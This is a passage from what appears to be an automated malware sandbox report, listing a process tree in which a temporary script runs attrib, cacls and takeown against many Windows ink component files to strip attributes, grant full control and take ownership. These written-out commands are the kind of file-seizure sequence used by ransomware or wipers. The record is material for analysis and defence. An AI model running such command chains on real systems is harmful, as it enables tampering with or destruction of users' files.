    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\correct.avi"
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\correct.avi" /E /G Admin:F /C
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\correct.avi"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\delete.avi""
  2⤵
  PID:2016
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\delete.avi"
    3⤵
    - Views/modifies file attributes
    PID:1624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\delete.avi" /E /G Admin:F /C
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\delete.avi"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\FlickLearningWizard.exe.mui""
  2⤵
  PID:1964
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\FlickLearningWizard.exe.mui"
    3⤵
    PID:844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\FlickLearningWizard.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\FlickLearningWizard.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1956
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkObj.dll.mui""
  2⤵
  PID:1124
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkObj.dll.mui"
    3⤵
    PID:888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkObj.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkObj.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkWatson.exe.mui""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkWatson.exe.mui"
    3⤵
    PID:1400
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkWatson.exe.mui" /E /G Admin:F /C
    3⤵
    PID:568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkWatson.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InputPersonalization.exe.mui""
  2⤵
  PID:1496
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InputPersonalization.exe.mui"
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InputPersonalization.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InputPersonalization.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IPSEventLogMsg.dll.mui""
  2⤵
  PID:676
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IPSEventLogMsg.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:1040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IPSEventLogMsg.dll.mui" /E /G Admin:F /C
    3⤵
    PID:368
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IPSEventLogMsg.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IpsMigrationPlugin.dll.mui""
  2⤵
  PID:1848
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IpsMigrationPlugin.dll.mui"
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IpsMigrationPlugin.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IpsMigrationPlugin.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi""
  2⤵
  PID:300
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi"
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi" /E /G Admin:F /C
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1868
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\micaut.dll.mui""
  2⤵
  PID:1904
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\micaut.dll.mui"
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\micaut.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\micaut.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mip.exe.mui""
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mip.exe.mui"
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mip.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mip.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1504
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mshwLatin.dll.mui""
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mshwLatin.dll.mui"
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mshwLatin.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mshwLatin.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:760
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\rtscom.dll.mui""
  2⤵
  PID:1976
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\rtscom.dll.mui"
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\rtscom.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\rtscom.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\ShapeCollector.exe.mui""
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\ShapeCollector.exe.mui"
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\ShapeCollector.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\ShapeCollector.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\split.avi""
  2⤵
  PID:1520
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\split.avi"
    3⤵
    - Views/modifies file attributes
    PID:1488
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\split.avi" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\split.avi"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tabskb.dll.mui""
  2⤵
  PID:388
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tabskb.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tabskb.dll.mui" /E /G Admin:F /C
    3⤵
    PID:676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tabskb.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipBand.dll.mui""
  2⤵
  PID:1832
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipBand.dll.mui"
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipBand.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipBand.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipRes.dll.mui""
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipRes.dll.mui"
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipRes.dll.mui" /E /G Admin:F /C
    3⤵
    PID:300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipRes.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tipresx.dll.mui""
  2⤵
  PID:1444
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tipresx.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:1680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tipresx.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipTsf.dll.mui""
  2⤵
  PID:1648
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipTsf.dll.mui"
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipTsf.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipTsf.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\tipresx.dll.mui""
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\tipresx.dll.mui"
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\tipresx.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\tipresx.dll.mui""
  2⤵
  PID:884
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\tipresx.dll.mui"
    3⤵
    PID:752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\tipresx.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\tipresx.dll.mui""
  2⤵
  PID:872
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\tipresx.dll.mui"
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\tipresx.dll.mui"
    3⤵
    PID:1056
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\FlickAnimation.avi""
  2⤵
  PID:2028
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\FlickAnimation.avi"
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\FlickAnimation.avi" /E /G Admin:F /C
    3⤵
    PID:836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\FlickAnimation.avi"
    3⤵
    PID:744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tipresx.dll.mui""
  2⤵
  PID:1324
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tipresx.dll.mui"
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tipresx.dll.mui"
    3⤵
    PID:1788
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\auxbase.xml""
  2⤵
  PID:1460
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\auxbase.xml"
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\auxbase.xml" /E /G Admin:F /C
    3⤵
    PID:1856
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\auxbase.xml"
    3⤵
    PID:1872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad.xml""
  2⤵
  PID:1772
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad.xml"
    3⤵
    - Views/modifies file attributes
    PID:1748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad.xml" /E /G Admin:F /C
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad.xml"
    3⤵
    - Modifies file permissions
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\ea.xml""
  2⤵
  PID:1220
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\ea.xml"
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\ea.xml" /E /G Admin:F /C
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\ea.xml"
    3⤵
    PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\keypadbase.xml""
  2⤵
  PID:1640
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\keypadbase.xml"
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\keypadbase.xml" /E /G Admin:F /C
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\keypadbase.xml"
    3⤵
    PID:1516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\kor-kor.xml""
  2⤵
  PID:1612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\kor-kor.xml"
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\kor-kor.xml" /E /G Admin:F /C
    3⤵
    PID:620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\kor-kor.xml"
    3⤵
    PID:1104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad.xml""
  2⤵
  PID:1684
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad.xml"
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad.xml" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad.xml"
    3⤵
    PID:1320
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base.xml""
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base.xml"
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base.xml" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base.xml"
    3⤵
    PID:1048
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\baseAltGr_rtl.xml""
  2⤵
  PID:1976
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\baseAltGr_rtl.xml"
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\baseAltGr_rtl.xml" /E /G Admin:F /C
    3⤵
    PID:1068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\baseAltGr_rtl.xml"
    3⤵
    PID:240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml""
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml"
    3⤵
    PID:816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml" /E /G Admin:F /C
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml"
    3⤵
    PID:1864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_ca.xml""
  2⤵
  PID:1520
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_ca.xml"
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_ca.xml" /E /G Admin:F /C
    3⤵
    PID:1828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_ca.xml"
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_heb.xml""
  2⤵
  PID:388
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_heb.xml"
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_heb.xml" /E /G Admin:F /C
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_heb.xml"
    3⤵
    PID:112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_jpn.xml""
  2⤵
  PID:1832
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_jpn.xml"
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_jpn.xml" /E /G Admin:F /C
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\takeown.exe
